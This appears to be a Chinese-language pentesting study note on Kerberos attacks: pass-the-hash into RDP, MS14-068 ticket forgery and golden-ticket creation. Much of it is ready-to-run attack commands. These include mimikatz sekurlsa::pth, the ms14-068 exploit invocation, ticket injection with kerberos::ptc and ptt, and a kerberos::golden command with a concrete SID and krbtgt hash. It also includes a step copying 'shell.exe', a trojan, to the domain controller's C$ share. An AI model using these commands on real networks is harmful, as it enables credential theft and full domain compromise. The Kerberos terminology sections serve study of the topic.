黄金票据

kerberos协议和黄金票据

VM克隆: 右键选项卡 ==> 管理 ==> 克隆

链接克隆: 相当于快捷方式, 用的是原本镜像, 不会多占用太多空间, 跟原本镜像互不影响, 但是删除原本镜像, 链接克隆的就没用了.

完整克隆: 相当于复制了一份镜像

PTH进3389端口
1
2
privilege::debug
sekurlsa::pth /user:xx /domian:xx /ntlm:xx /run:"mstsc.exe /restrictedadmin"

Kerberos

AS(Authentication Server)= 认证服务器

KDC(Key Distribution Center)= 密钥分发中心

TGT(Ticket Granting Ticket)= 票据授权票据,票据的票据

TGS(Ticket Granting Server)= 票据授权服务器

SS(Service Server)= 特定服务提供端

PASS THE TICKET

金票(golden ticket): 可以访问任意的服务, 权限较高

银票(silver ticket): 可以访问指定服务, 权限较低

漏洞利用(MS14-068):

1
2
3
4
5
6
7
MS14-068:
MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其
Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证。
影响范围:
Windows Server 2003、Windows Server 2008、Windows Server 2008 R2、Windows Server 2012 及 Windows Server 2012 R2 、Windows Vista、Windows 7、Windows 8 及 Windows 8.1版本

补丁编号: KB3011780
利用条件
  1. 拿到域控中某台主机的权限, 并提权
  2. 进本的信息搜集, 密码hash, 用户的sid, 域名信息
  3. 没有打过补丁KB3011780
利用:

搜集信息:

​ whoami /user ==> 获取sid

​ ipconfig /all ==> 域名, 域控ip

​ hashdump | mimikatz ==> 账户hash

​ msf身份盗用: steal_token pid

​ msf身份恢复: rev2self

ms14-068:

ms14-068 -u @ -s -d -p clear_password

注入之前: 需要清除票据

​ CMD: klist purge 清除票据 | klist 查看票据

​ mimikatz: kerberos::purge 清除票据 | kerberos::list 查看票据

清除票据后注入票据:

mimikatz “privilege::debug” “kerberos::ptc xxxx.ccache” exit

dir \\域控主机名\C$ ==> 访问成功即漏洞利用成功, 拿到域控权限

golden ticket

​ 前提: 拿下域控的权限(提权), 获取到域控的krbtgt账户密码(hash)

​ copy shell.exe \WIN-AFETP0IBEKR\C$ ==> 上传木马

1
2
3
4
5
6
7
8
kerberos::purge

kerberos::golden /user:Administrator /domain:ilu.com /sid:S-1-5-21-542716808-1865610110-2530282010 /krbtgt:9d093f0496bcbbf9999845340c57cd6b /ticket:gold.kirbi

kerberos::ptt gold.kirbi

dir \\域控主机名\C$
上传用copy